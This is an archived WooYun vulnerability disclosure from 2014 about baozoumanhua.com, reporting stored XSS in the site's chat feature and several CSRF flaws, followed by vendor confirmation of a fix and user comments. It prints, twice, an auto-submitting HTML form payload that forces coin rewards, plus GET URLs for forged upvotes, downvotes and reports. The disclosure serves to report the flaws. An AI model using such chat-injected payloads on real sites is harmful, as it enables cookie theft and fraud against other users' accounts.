当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-086824

漏洞标题:暴漫主站存储xss坐等王尼玛中枪+刷金币等CSRF

相关厂商:baozoumanhua.com

漏洞作者: 浅蓝

提交时间:2014-12-11 20:00

修复时间:2014-12-12 10:15

公开时间:2014-12-12 10:15

漏洞类型:xss跨站脚本攻击

危害等级:高

自评Rank:20

漏洞状态:厂商已经修复

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-12-11: 细节已通知厂商并且等待厂商处理中
2014-12-11: 厂商已经确认,细节仅向厂商公开
2014-12-12: 厂商已经修复漏洞并主动公开,细节向公众公开

简要描述:

暴漫主站存储xss指哪打哪 坐等王尼玛中枪 +刷金币csrf+刷赞刷差评csrf+分站恶意举报csrf

详细说明:

0x1 主站Xss
www.baozoumanhua.com
主站登陆后有个聊天功能

2YBT[2TF80L`N420ORUZ034.jpg


聊天框里可打任何html代码

%2WSERWFWT@{ZBP93%SMC9I.jpg

已弹框

M3S10LJLPXORKM~CCR@(YDG.png

xss平台已收到cookies数据
0x2 暴漫分站恶意举报 and 刷赞csrf

Z)SQGYAW{5Q461B5YOGRN1R.jpg


在URL改一下帖子ID get方式提交就可以举报
http://baozoumanhua.com/articles/帖子ID/dn 刷差评
http://baozoumanhua.com/articles/帖子ID/up 刷赞

_MM0)CF$%}PB_PW44PHKN)P.png


在聊天窗口 利用<img> 加载以上三个URL 即可触发csrf

}{$X61N23L6${PLWJ%7)A7K.png


0x3 刷金币漏洞
先注册个小号 然后发一个作品

@GI%{K_GR5R$)Q~PO[0T`@I.jpg


聊天框中输入

<form id="post123" name="post123" action="http://baozoumanhua.com/articles/帖子ID/reward.json" method="post">
    <input type=text name=formhash value="100">
    <script>
        document.getElementById('post123').submit();
    </script>
</form>


发给第一个账号 第一个账号浏览过这条信息后看自己的消息

_MW56FNT]T485`V}7]{{GM1.jpg


被打赏10尼玛币

漏洞证明:

0x1 主站Xss
www.baozoumanhua.com
主站登陆后有个聊天功能

2YBT[2TF80L`N420ORUZ034.jpg


聊天框里可打任何html代码

%2WSERWFWT@{ZBP93%SMC9I.jpg

已弹框

M3S10LJLPXORKM~CCR@(YDG.png

xss平台已收到cookies数据
0x2 暴漫分站恶意举报 and 刷赞csrf

Z)SQGYAW{5Q461B5YOGRN1R.jpg


在URL改一下帖子ID get方式提交就可以举报
http://baozoumanhua.com/articles/帖子ID/dn 刷差评
http://baozoumanhua.com/articles/帖子ID/up 刷赞

_MM0)CF$%}PB_PW44PHKN)P.png


在聊天窗口 利用<img> 加载以上三个URL 即可触发csrf

}{$X61N23L6${PLWJ%7)A7K.png


0x3 刷金币漏洞
先注册个小号 然后发一个作品

@GI%{K_GR5R$)Q~PO[0T`@I.jpg


聊天框中输入

<form id="post123" name="post123" action="http://baozoumanhua.com/articles/帖子ID/reward.json" method="post">
    <input type=text name=formhash value="100">
    <script>
        document.getElementById('post123').submit();
    </script>
</form>


发给第一个账号 第一个账号浏览过这条信息后看自己的消息

_MW56FNT]T485`V}7]{{GM1.jpg


被打赏10尼玛币

修复方案:

做好过滤

版权声明:转载请注明来源 浅蓝@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2014-12-11 22:32

厂商回复:

最新状态:

2014-12-12:已修复,谢谢!

漏洞评价:

评论

  1. 2014-12-11 20:05 | onlycjeg ( 实习白帽子 | Rank:38 漏洞数:5 | 我就看看,我不说话.)

    王尼玛!

  2. 2014-12-11 20:07 | 机器猫 ( 普通白帽子 | Rank:1141 漏洞数:253 | 爱生活、爱腾讯、爱网络!)

    草泥马!

  3. 2014-12-11 20:50 | SuperRookie ( 实习白帽子 | Rank:39 漏洞数:7 | 求收编,本人会注入,会上传,会Xss,会破...)

    首席鉴黄师 直接就干掉你 渣渣

  4. 2014-12-11 21:56 | 泳少 ( 普通白帽子 | Rank:231 漏洞数:79 | ★ 梦想这条路踏上了,跪着也要...)

    默默的关注下大黑阔

  5. 2014-12-12 01:55 | U神 ( 核心白帽子 | Rank:1285 漏洞数:142 | 感谢乌云,知恩不忘,其实我一直都在乌云默...)

    @小川

  6. 2014-12-12 10:34 | Woodee ( 路人 | 还没有发布任何漏洞 | 乌云路人甲,打脸pa pa pa)

    @小川 快来认领

  7. 2014-12-12 10:46 | 浅蓝 ( 普通白帽子 | Rank:274 漏洞数:109 | 爱安全:www.ixsec.orgXsec社区:zone.ixse...)

    @Woodee what

  8. 2014-12-12 10:51 | 纠结师 ( 实习白帽子 | Rank:53 漏洞数:12 | 传说中的废材)

    玩你妈 你直接一个唉就回复了 有意思吗?

  9. 2014-12-12 11:52 | 浅蓝 ( 普通白帽子 | Rank:274 漏洞数:109 | 爱安全:www.ixsec.orgXsec社区:zone.ixse...)

    @纠结师 好好说话

  10. 2014-12-12 11:53 | Woodee ( 路人 | 还没有发布任何漏洞 | 乌云路人甲,打脸pa pa pa)

    @浅蓝 +1

  11. 2014-12-12 12:13 | 围剿 ( 路人 | Rank:17 漏洞数:5 | Evil decimal)

    王尼玛+1

  12. 2014-12-12 15:00 | 码农 ( 路人 | Rank:2 漏洞数:1 | 爱肉肉~)

    男神~

  13. 2014-12-12 16:36 | flywin ( 路人 | Rank:9 漏洞数:1 | 有好的安卓或者IOS远程控制的请联系我,RMB...)

    尼玛

  14. 2014-12-15 11:15 | 黑色二进制 ( 路人 | Rank:5 漏洞数:3 | 一只小白)

    厂商回复亮了

  15. 2014-12-15 13:30 | 不悔梦归处 ( 路人 | Rank:0 漏洞数:1 | 不悔梦归处,只恨太匆匆)

    第一次看到厂商这么无奈~

  16. 2014-12-23 18:11 | Jeechan ( 路人 | Rank:0 漏洞数:1 | 一个深沉又滑稽的人)

    ……王尼玛

  17. 2014-12-28 16:22 | 飞段 ( 路人 | Rank:4 漏洞数:15 | 求收编,本人会注入,会上传,会Xss,会破...)

    王尼玛 +2

  18. 2015-01-06 18:05 | Ztz ( 普通白帽子 | Rank:152 漏洞数:40 | 自由职业)

    聊天框能跑HTML。运维已被开除。

  19. 2015-01-15 20:42 | 李宇航的小柠檬 ( 路人 | Rank:5 漏洞数:1 | 小柠檬甜不甜)

    niubi